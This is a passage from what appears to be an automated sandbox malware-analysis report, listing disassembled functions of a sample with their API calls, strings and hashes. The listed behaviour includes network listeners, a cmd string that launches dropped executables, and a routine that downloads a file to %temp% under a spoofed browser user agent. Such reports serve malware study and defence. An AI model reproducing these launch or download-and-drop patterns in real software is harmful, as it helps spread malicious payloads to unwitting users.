                                                                                                                                      • Part of subcall function 0040E310: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
                                                                                                                                      • Part of subcall function 0040E310: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
                                                                                                                                      • Part of subcall function 0040E310: StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                                                                    • String ID: 239.255.255.250$X#A
                                                                                                                                    • API String ID: 726339449-2206458040
                                                                                                                                    • Opcode ID: 6911e90d37da8db62bd51864f6155ca9886bbc89aad1387f27fc75aef26ea545
                                                                                                                                    • Instruction ID: e8e0ae0e245dd7c097b927a75a8676c49a2f7ecfee9f68fb0cb72d84dadb0e27
                                                                                                                                    • Opcode Fuzzy Hash: 6911e90d37da8db62bd51864f6155ca9886bbc89aad1387f27fc75aef26ea545
                                                                                                                                    • Instruction Fuzzy Hash: 7F4119B4E00208ABDB04DFE4D989BEEBBB5EF48304F108569F505B7390E7B55A44CB59
                                                                                                                                    Function 00402020 Relevance: 16.6, APIs: 11, Instructions: 131networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                                                                                    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                                                                                      • Part of subcall function 0040DBB0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040DBCE
                                                                                                                                    • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                                                                                    • setsockopt.WS2_32 ref: 004020D1
                                                                                                                                    • htons.WS2_32(?), ref: 00402101
                                                                                                                                    • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                                                                                    • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                                                                                    • WSACreateEvent.WS2_32 ref: 0040213A
                                                                                                                                    • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                                                                                      • Part of subcall function 0040DBE0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
                                                                                                                                      • Part of subcall function 0040DBE0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
                                                                                                                                      • Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
                                                                                                                                      • Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
                                                                                                                                      • Part of subcall function 0040DBE0: DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
                                                                                                                                      • Part of subcall function 0040DBE0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1603358586-0
                                                                                                                                    • Opcode ID: 12e9ac71e1e64606d6e310d867efcd3aad974152cf34b1f89b4218bf20e906ed
                                                                                                                                    • Instruction ID: 7304e093e5df1f4af0f3941d52a0ba2ce6ba101da239ecb0b9d238ba0c2be26e
                                                                                                                                    • Opcode Fuzzy Hash: 12e9ac71e1e64606d6e310d867efcd3aad974152cf34b1f89b4218bf20e906ed
                                                                                                                                    • Instruction Fuzzy Hash: EE41B170640301ABD3209F74CC4AF5B77E4AF44720F108A2DF6A9EA2D4E7F4E545875A
                                                                                                                                    Function 00406660 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 106comCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0040666B
                                                                                                                                    • CoCreateInstance.OLE32(00413030,00000000,00000001,00413010,00000008), ref: 00406683
                                                                                                                                    • wsprintfW.USER32 ref: 004066C4
                                                                                                                                    • wsprintfW.USER32 ref: 004066E5
                                                                                                                                    Strings
                                                                                                                                    • cl@, xrefs: 004066A0
                                                                                                                                    • %comspec%, xrefs: 004066EE
                                                                                                                                    • /c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe, xrefs: 004066B8
                                                                                                                                    • /c start %s & start %s\rvlcfg.exe, xrefs: 004066D9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: wsprintf$CreateInitializeInstance
                                                                                                                                    • String ID: %comspec%$/c start %s & start %s\rvlcfg.exe$/c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe$cl@
                                                                                                                                    • API String ID: 1147330536-497122036
                                                                                                                                    • Opcode ID: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
                                                                                                                                    • Instruction ID: e126a915917d584c7bd6e3cca15df18ca7e9be12ab45cc4692bb8e15b90f0fb7
                                                                                                                                    • Opcode Fuzzy Hash: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
                                                                                                                                    • Instruction Fuzzy Hash: 67411D75A40208AFC704DF98C885FDEB7B5AF88704F208199F515A72A5C675AE81CB54
                                                                                                                                    Function 00401470 Relevance: 9.1, APIs: 6, Instructions: 89networkthreadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                                                                                    • htons.WS2_32(?), ref: 00401508
                                                                                                                                    • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                                                                                    • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
                                                                                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
                                                                                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C
                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4174406920-0
                                                                                                                                    • Opcode ID: 93d4027be7e49e3bb9003fc5ae654a5e9afe1d061a8d67f74f828f69ef3a14c4
                                                                                                                                    • Instruction ID: 62ed05d6da85abd953b38b2f92cd08377c0ec6205023cd889ce16e316194a11c
                                                                                                                                    • Opcode Fuzzy Hash: 93d4027be7e49e3bb9003fc5ae654a5e9afe1d061a8d67f74f828f69ef3a14c4
                                                                                                                                    • Instruction Fuzzy Hash: 1731F971A443016BE320DF749C46F9BB6E0AF48B10F40493DF659EB2D0D3B4D544879A
                                                                                                                                    Function 0040D770 Relevance: 9.1, APIs: 6, Instructions: 67sleepnetworkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040D782
                                                                                                                                    • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D7A8
                                                                                                                                    • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D7DF
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040D7F4
                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040D814
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040D81A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountTick$Sleepioctlsocketrecv
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 107502007-0
                                                                                                                                    • Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                    • Instruction ID: 457d80db37ae817004d1223b894239af033459ee6c7143085fc0b5fbd1cdb933
                                                                                                                                    • Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                    • Instruction Fuzzy Hash: 13310A75D00209EFCB04DFA4D948AEEBBB0FF44315F10866AE821A7280D7749A54CB99
                                                                                                                                    Function 0040B430 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • htons.WS2_32(00000050), ref: 0040B45D
                                                                                                                                      • Part of subcall function 0040B3F0: inet_addr.WS2_32(0040B471), ref: 0040B3FA
                                                                                                                                      • Part of subcall function 0040B3F0: gethostbyname.WS2_32(?), ref: 0040B40D
                                                                                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
                                                                                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 0040B496
                                                                                                                                    • getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8
                                                                                                                                    Strings
                                                                                                                                    • www.update.microsoft.com, xrefs: 0040B467
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                                                                    • String ID: www.update.microsoft.com
                                                                                                                                    • API String ID: 4063137541-1705189816
                                                                                                                                    • Opcode ID: 6e98f9c7e97e06aef12c993c0efbc8d88427d4f6baa20c341407c54d3fa54141
                                                                                                                                    • Instruction ID: af49af799945b34e8f77a8241ecd355db6f1f506d792f0fdd03f8566860bb8e6
                                                                                                                                    • Opcode Fuzzy Hash: 6e98f9c7e97e06aef12c993c0efbc8d88427d4f6baa20c341407c54d3fa54141
                                                                                                                                    • Instruction Fuzzy Hash: DB212CB4D102099BCB04DFE8D946AEEBBB4EF48300F104169E514F7390E7B45A44DBAA
                                                                                                                                    Function 004013B0 Relevance: 6.1, APIs: 4, Instructions: 63networkthreadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DFDD,00000000), ref: 004013D5
                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                                                                    • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
                                                                                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
                                                                                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C
                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00001100,00000000,00000000,00000000), ref: 00401459
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3943618503-0
                                                                                                                                    • Opcode ID: 553d10466bbec8e054a760f45873b700e7f933e75f0b3e1bb69a1e19c2fd66b5
                                                                                                                                    • Instruction ID: 36f5780ae761d5720ce2b15666c8ad773c7a5b56cb4710f169ddd2cda5c78557
                                                                                                                                    • Opcode Fuzzy Hash: 553d10466bbec8e054a760f45873b700e7f933e75f0b3e1bb69a1e19c2fd66b5
                                                                                                                                    • Instruction Fuzzy Hash: DE116674A417106BE3209F749C0AF877AE0AF04B54F50892DF659E72E1E3B49544879A
                                                                                                                                    Function 0040C830 Relevance: 4.5, APIs: 3, Instructions: 26encryptionCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CryptAcquireContextW.ADVAPI32(004083EF,00000000,00000000,00000001,F0000040,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C843
                                                                                                                                    • CryptGenRandom.ADVAPI32(004083EF,?,00000000,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C859
                                                                                                                                    • CryptReleaseContext.ADVAPI32(004083EF,00000000,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C865
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1815803762-0
                                                                                                                                    • Opcode ID: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                                    • Instruction ID: f90ee11572ba5f49e3e1a660dc1e1657e7f5db47d76125bfba77a944767198f2
                                                                                                                                    • Opcode Fuzzy Hash: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                                    • Instruction Fuzzy Hash: 69E012B5650208FBDB14DFD1EC49FDA776CAB48B01F108554F709E7180DAB5EA4097A8
                                                                                                                                    Function 0040DF20 Relevance: 3.0, APIs: 2, Instructions: 15timenativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
                                                                                                                                    • RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Time$QuerySecondsSince1980System
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1987401769-0
                                                                                                                                    • Opcode ID: 5c98a04c039906c0b732b0f639c8761212275eae2c79c402d7dd6553d16f435e
                                                                                                                                    • Instruction ID: 284f4c0ca90a751934941b1d9bfeddc82ee070f17a0c71d7a2ad06256d95dcf5
                                                                                                                                    • Opcode Fuzzy Hash: 5c98a04c039906c0b732b0f639c8761212275eae2c79c402d7dd6553d16f435e
                                                                                                                                    • Instruction Fuzzy Hash: 71D0C779D4010DBBCB00DBE4E84DCDDB77CEB44201F0086D6ED1593150EAB06658CBD5
                                                                                                                                    Function 00404090 Relevance: 1.7, Strings: 1, Instructions: 488COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                    • Opcode ID: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
                                                                                                                                    • Instruction ID: 5fd1260cd0c1bb1f0d43ca887b35fd9fe7aa376b80e30ba4f5f1b1723d8df557
                                                                                                                                    • Opcode Fuzzy Hash: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
                                                                                                                                    • Instruction Fuzzy Hash: 2C124FF5D00109ABCF14DF98D985AEFB7B5BB98304F10816DE609B7380D739AA41CBA5
                                                                                                                                    Function 0040FB45 Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • NtQueryVirtualMemory.NTDLL ref: 0040FBF6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryQueryVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2850889275-0
                                                                                                                                    • Opcode ID: 801e3abdb9ed3473d766d6bc3744bf4a8f04e52caf0f4b1d7f90672c87cc4716
                                                                                                                                    • Instruction ID: 340d7b290d5355f760e33cf283827fd55aa9a8eadb82a746881808a00d0f8de8
                                                                                                                                    • Opcode Fuzzy Hash: 801e3abdb9ed3473d766d6bc3744bf4a8f04e52caf0f4b1d7f90672c87cc4716
                                                                                                                                    • Instruction Fuzzy Hash: CD61D6316046098FDB39CB29D49166A73A5FF85754F25813BDC06E7AD0E338EC4ACA4C
                                                                                                                                    Function 0040A890 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetProcessHeaps.KERNEL32(000000FF,?), ref: 0040A8AC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HeapsProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1420622215-0
                                                                                                                                    • Opcode ID: 1373c558315c2bb7b1b39264dd611deb399c5604e49ba0dd3c9b15e56f9cb6f7
                                                                                                                                    • Instruction ID: 4a2b5bc9ffc7c309cb72e1a35e8a8f61e1833fedd8d517872c2a42ed84d10103
                                                                                                                                    • Opcode Fuzzy Hash: 1373c558315c2bb7b1b39264dd611deb399c5604e49ba0dd3c9b15e56f9cb6f7
                                                                                                                                    • Instruction Fuzzy Hash: DD01DAF0904218CADB209B14D9887ADB774AB84304F1185EAD74977281C3781EDADF5E
                                                                                                                                    Function 0040AEB0 Relevance: .4, Instructions: 371COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 231c24adcade84eecc3356998d411f5491ca9746df8bd507928c4e2bbd5fa8a5
                                                                                                                                    • Instruction ID: 161e6bb5934f27057a9722b698e232d6f14762762655f0a3ce64c62cefac505d
                                                                                                                                    • Opcode Fuzzy Hash: 231c24adcade84eecc3356998d411f5491ca9746df8bd507928c4e2bbd5fa8a5
                                                                                                                                    • Instruction Fuzzy Hash: 0D127DB4D012199FCB48CF99D9919AEFBB2FF88304F24856AE415BB345D734AA01CF94
                                                                                                                                    Function 0040F908 Relevance: .1, Instructions: 77COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 055ce3a16072e11c5b5b43c4deef216cb34a050bfe9534eea9d89275913ec06d
                                                                                                                                    • Instruction ID: 80201675dd9b1cda4480dbd7700016e3944d41601b7f9a5a171a0727e2a58fe8
                                                                                                                                    • Opcode Fuzzy Hash: 055ce3a16072e11c5b5b43c4deef216cb34a050bfe9534eea9d89275913ec06d
                                                                                                                                    • Instruction Fuzzy Hash: 3821D872900204ABCB24EF69C8819A7B7A5FF44350B05807AED559B285D734F919CBE0
                                                                                                                                    Function 0040F560 Relevance: 73.7, APIs: 36, Strings: 6, Instructions: 231filesleepnetworkCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040F569
                                                                                                                                    • srand.MSVCRT ref: 0040F570
                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040F590
                                                                                                                                    • strlen.NTDLL ref: 0040F59A
                                                                                                                                    • mbstowcs.NTDLL ref: 0040F5B1
                                                                                                                                    • rand.MSVCRT ref: 0040F5B9
                                                                                                                                    • rand.MSVCRT ref: 0040F5CD
                                                                                                                                    • wsprintfW.USER32 ref: 0040F5F4
                                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F60A
                                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F639
                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F668
                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F69B
                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F6CC
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040F6DB
                                                                                                                                    • wsprintfW.USER32 ref: 0040F6F4
                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040F704
                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040F70F
